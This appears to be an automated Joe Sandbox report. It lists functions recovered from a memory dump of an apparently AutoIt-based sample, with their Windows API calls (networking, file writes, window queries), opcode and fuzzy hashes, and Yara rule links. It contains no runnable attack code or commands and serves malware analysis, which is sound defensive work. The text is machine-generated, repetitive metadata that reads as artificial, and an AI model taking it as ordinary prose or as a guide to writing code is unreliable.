Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: c9b20846ff639f5c32b18eb7b54d10cfc89e880ebc74f29355b884c190685e58
Instruction ID: 38b35d357e3e97082a2411c0f03c95a2eebe2f0059371d67120016c2d7e0a5bb
Opcode Fuzzy Hash: c9b20846ff639f5c32b18eb7b54d10cfc89e880ebc74f29355b884c190685e58
Instruction Fuzzy Hash: FC21F9B1504794EFEB3297248C59FEBBBED9B06308F14408EE79E5A2C1C3785A84CB55

Function 006E92C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON

Download Yara Rule

APIs

Part of subcall function 006AF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,006DAEA5,?,?,00000000,00000008), ref: 006AF282
Part of subcall function 006AF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,006DAEA5,?,?,00000000,00000008), ref: 006AF2A6

gethostbyname.WS2_32(?), ref: 006E92F0
WSAGetLastError.WS2_32(00000000), ref: 006E92FB
_memmove.LIBCMT ref: 006E9328
inet_ntoa.WS2_32(?), ref: 006E9333

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 47155d910127a414ddfbc3e865ae37df63cfe8b5ecf959fd8242c6aaedddf994
Instruction ID: 20c0b4155513ca0daa8e0017ec9c5e33c05f3c1147192de9ec26501762cb0a26
Opcode Fuzzy Hash: 47155d910127a414ddfbc3e865ae37df63cfe8b5ecf959fd8242c6aaedddf994
Instruction Fuzzy Hash: 4B116076600109AFCF54FBA5CD56DEE77BEEF043107108069F506A72A1DB30AE04CB69

Function 006B010A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 006B45EC: __FF_MSGBANNER.LIBCMT ref: 006B4603
Part of subcall function 006B45EC: __NMSG_WRITE.LIBCMT ref: 006B460A
Part of subcall function 006B45EC: RtlAllocateHeap.NTDLL(011B0000,00000000,00000001), ref: 006B462F

std::exception::exception.LIBCMT ref: 006B013E
__CxxThrowException@8.LIBCMT ref: 006B0153

Part of subcall function 006B7495: RaiseException.KERNEL32(?,?,0069125D,00746598,?,?,?,006B0158,0069125D,00746598,?,00000001), ref: 006B74E6

Strings

bad allocation, xrefs: 006B0137

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID: bad allocation
API String ID: 3902256705-2104205924
Opcode ID: f5bab5883dbedf08753e8f2e9ae414596fc9e6b17f7150e0fe55d12a93c9ee6a
Instruction ID: 5adb34d817ad072d7862d48c93a550b2a20c5b51575c2d7597929f2323cdf986
Opcode Fuzzy Hash: f5bab5883dbedf08753e8f2e9ae414596fc9e6b17f7150e0fe55d12a93c9ee6a
Instruction Fuzzy Hash: 22F0A4F510421EA6D729EAECDC029DE7BEA9F05350F104429F90592182DBB48AC097A9

Function 0069C610 Relevance: 4.6, APIs: 3, Instructions: 125COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0069C00E,?,?,?,?,00000010), ref: 0069C627
MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 0069C65F
_memmove.LIBCMT ref: 0069C697

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: ed237986ce62159d04ebdf82ed4852171f7535fef197eb26e3dee87f42c6ea4e
Instruction ID: 3596037034634d6846230a5e1432f33898cbdc67164a36879dc99c80ac8f9550
Opcode Fuzzy Hash: ed237986ce62159d04ebdf82ed4852171f7535fef197eb26e3dee87f42c6ea4e
Instruction Fuzzy Hash: 0F3129B2205201ABDF649B78DC46B6BB7DEEF44320F10853EF85AC76D0EA32E8508755

Function 006B45EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 006B4603

Part of subcall function 006B8E52: __NMSG_WRITE.LIBCMT ref: 006B8E79
Part of subcall function 006B8E52: __NMSG_WRITE.LIBCMT ref: 006B8E83

__NMSG_WRITE.LIBCMT ref: 006B460A

Part of subcall function 006B8EB2: GetModuleFileNameW.KERNEL32(00000000,00750312,00000104,?,00000001,006B0127), ref: 006B8F44
Part of subcall function 006B8EB2: ___crtMessageBoxW.LIBCMT ref: 006B8FF2

Part of subcall function 006B1D65: ___crtCorExitProcess.LIBCMT ref: 006B1D6B
Part of subcall function 006B1D65: ExitProcess.KERNEL32 ref: 006B1D74

Part of subcall function 006B889E: __getptd_noexit.LIBCMT ref: 006B889E

RtlAllocateHeap.NTDLL(011B0000,00000000,00000001), ref: 006B462F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 3aa18379e35644276631cc9a4ccd94c981ad60b77b5bcf6df9b492890eb5c872
Instruction ID: 8869ba4d904efd60e82f4ed59a1b68c982306e46a9dd0852725813d3a0aec8ae
Opcode Fuzzy Hash: 3aa18379e35644276631cc9a4ccd94c981ad60b77b5bcf6df9b492890eb5c872
Instruction Fuzzy Hash: F7019BF16013056ED6603B24AC51AEA334A9F82761F11012EFA05972C7EFB49CC1C758

Function 0069E60E Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 0069E646
DispatchMessageW.USER32(?), ref: 0069E651
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0069E664

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: a0f90a48165ce4bb5e1d44c148c2c2947e1c149de09239a5393b5c4ee95e2457
Instruction ID: 06dd221c56224427fa054cf6be52108997bc97940ba6d9dcf014ec6a3001f661
Opcode Fuzzy Hash: a0f90a48165ce4bb5e1d44c148c2c2947e1c149de09239a5393b5c4ee95e2457
Instruction Fuzzy Hash: 1CF058722043459BDB20EBE08C45BABB3DEAB84381F44483DF641C2180EAE9E8048B62

Function 006DC450 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006DC45E

Part of subcall function 006B28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,006B8715,00000000,006B88A3,006B4673,?), ref: 006B28DE
Part of subcall function 006B28CA: GetLastError.KERNEL32(00000000,?,006B8715,00000000,006B88A3,006B4673,?), ref: 006B28F0

_free.LIBCMT ref: 006DC46F
_free.LIBCMT ref: 006DC481

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
Instruction ID: 2f1e9d156495877d7cf067b9503cd8efb87047a982600957303abca5332209fe
Opcode Fuzzy Hash: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
Instruction Fuzzy Hash: 1CE012E1A0070396CA64A9796864FF353CD6F04B61F14492EF449D7382DF14E884D678

Function 006A058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON

Download Yara Rule

Strings

CALL, xrefs: 006A10DB

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 5932d8b575d7f968e2df326bdf563988482ba2182fd49cf4ebf522419d16fa1c
Instruction ID: 09a20adeade7b442e98f4052e21a2abeef0ae7010fa042ab79c9efd440c679b8
Opcode Fuzzy Hash: 5932d8b575d7f968e2df326bdf563988482ba2182fd49cf4ebf522419d16fa1c
Instruction Fuzzy Hash: CE226C70508341DFEB24EF14C490A6AB7E2BF86304F15896DE89A8B362D775EC85CF46

Function 00694010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0069405A

Strings

EA06, xrefs: 007057B9

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 848b1dab0db4825eacc4bb0f111dddb3fe0b2561d2b95f05fe7849ddab4d89e9
Instruction ID: 41d0e2901992fe884126099f45341854fbf3f835bc4c10327ad719a1bef6bf59
Opcode Fuzzy Hash: 848b1dab0db4825eacc4bb0f111dddb3fe0b2561d2b95f05fe7849ddab4d89e9
Instruction Fuzzy Hash: 85418C31A041549BCF119B6488A1FBF7FAF9B55300F184569EA829BA82CE218DC787B1

Function 006E013F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 006E01A9

Strings

0.0.0.0, xrefs: 006E01B7

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _wcscmp
String ID: 0.0.0.0
API String ID: 856254489-3771769585
Opcode ID: 7c1da1f3c012a4a645d67702c3e1a238639c2c652b8c978c0f608ecdcdcdf8be
Instruction ID: f6fa7d73a44a5d06a4f40a9312667226930570f1e0affb93669489be96796900
Opcode Fuzzy Hash: 7c1da1f3c012a4a645d67702c3e1a238639c2c652b8c978c0f608ecdcdcdf8be
Instruction Fuzzy Hash: 4D112335700304DFCB04EB95D991ED9B3EAAF84720F10805DF505AF391DAB0ED828BA8

Function 00693BFF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00703CF1

Part of subcall function 006931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 006931DA

Part of subcall function 00693A67: SHGetMalloc.SHELL32(1<i), ref: 00693A7D
Part of subcall function 00693A67: SHGetDesktopFolder.SHELL32(?), ref: 00693A8F
Part of subcall function 00693A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00693AD2

Part of subcall function 00693B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,007522E8,?), ref: 00693B65

Strings

X, xrefs: 00703D01

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Path$FullName$DesktopFolderFromListMalloc_memset
String ID: X
API String ID: 2727075218-3081909835
Opcode ID: fe0668ded751847298c9196dcd33f2691326f8f4ce1985146d8cdd0504a56621
Instruction ID: 422fb8b5d1d4127251b89c4074c805de0ccc3aa6f9895fefb28a1f7953eb10e0
Opcode Fuzzy Hash: fe0668ded751847298c9196dcd33f2691326f8f4ce1985146d8cdd0504a56621
Instruction Fuzzy Hash: 51118D71A10298ABCF45DFD8D8056DE7BFDAF45704F00801DE405BB381DBB95A49CBA5

Function 006934C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 007034AA

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: LibraryLoad
String ID: >>>AUTOIT NO CMDEXECUTE<<<
API String ID: 1029625771-2684727018
Opcode ID: 63b29ae06de13a9fab19cb6324e7b556e2fb689c56baf39f7964b15558864411
Instruction ID: 1938c36ae870567bde205f1626b243a013ed7612cd0718233a641b9566fee15a
Opcode Fuzzy Hash: 63b29ae06de13a9fab19cb6324e7b556e2fb689c56baf39f7964b15558864411
Instruction Fuzzy Hash: 8FF0447190021DAACF51EEA0D8519FFB7BDAA10310B10852AB82692691EB349B09CB25

Function 006D6852 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006D6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,006D685E,?,?,?,00704A5C,0072E448,00000003,?,?), ref: 006D66E2

WriteFile.KERNEL32(?,?,"u,00000000,00000000,?,?,?,00704A5C,0072E448,00000003,?,?,00694C44,?,?), ref: 006D686C

Strings

"u, xrefs: 006D6864

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: File$PointerWrite
String ID: "u
API String ID: 539440098-1676433167
Opcode ID: 0389e352b25d68443889ebb48e30a1a5e2c5bb2e13ca57c176deaa10fcd30071
Instruction ID: 3fa00a509028934899d5a37231af079bf970e5f2e4543e9d04679b89acc975c3
Opcode Fuzzy Hash: 0389e352b25d68443889ebb48e30a1a5e2c5bb2e13ca57c176deaa10fcd30071
Instruction Fuzzy Hash: 63E04636400218BBDB20AF94D805ACABBB9EB08350F00451AF94195150D7B5EE149BA4

Function 006AF461 Relevance: 3.2, APIs: 2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6734c055cb21a2b5c51dca68378d12fd90c9eccd78c2cd8b29a0a8e2cb9d3c92
Instruction ID: 806f4a6b0e2dbd1b2d23abd489ff7126cfeaa0a5d83c1f729f05782be63b4d63
Opcode Fuzzy Hash: 6734c055cb21a2b5c51dca68378d12fd90c9eccd78c2cd8b29a0a8e2cb9d3c92
Instruction Fuzzy Hash: 7651C2316043018FCB54EF68C4A1BAA73EAAF49320F04856DF9968B6D2DB30EC45CF56

Function 006E8065 Relevance: 3.1, APIs: 2, Instructions: 98COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 006E8074
GetForegroundWindow.USER32 ref: 006E807A

Part of subcall function 006E6B19: GetWindowRect.USER32(?,?), ref: 006E6B2C

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$CursorForegroundRect
String ID:
API String ID: 1066937146-0
Opcode ID: f0d743547a392ec90fbeaf40da275f55f33f1df92de9019ac64ee7c9cd2472ca
Instruction ID: 6f118b647fe939556fa1012035c68e0cdd64d9d605d4181b84a954d2f308fe80
Opcode Fuzzy Hash: f0d743547a392ec90fbeaf40da275f55f33f1df92de9019ac64ee7c9cd2472ca
Instruction Fuzzy Hash: 72316F75A00209AFDF00EFA5CC91AEEB7BAFF04314F10842EE945A7251DB34AE05CB94

Function 00691DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 0070DB31
IsWindow.USER32(00000000), ref: 0070DB6B

Part of subcall function 00691F04: GetForegroundWindow.USER32 ref: 00691FBE

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$Foreground
String ID:
API String ID: 62970417-0
Opcode ID: 57bf614b8ce76eabbfb2aa9041e62da4205dda8378d4e33a4074f23808695898
Instruction ID: c652754dac410cb24f4e6a038d692972052e86e07f2b3bc15981284811059c26
Opcode Fuzzy Hash: 57bf614b8ce76eabbfb2aa9041e62da4205dda8378d4e33a4074f23808695898
Instruction Fuzzy Hash: 2121C0B2600206AADF60AB74C851FFE77EE9F41784F11442DF95ACB181DB74EE019764

Function 006CE2E8 Relevance: 3.1, APIs: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0069193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00691952

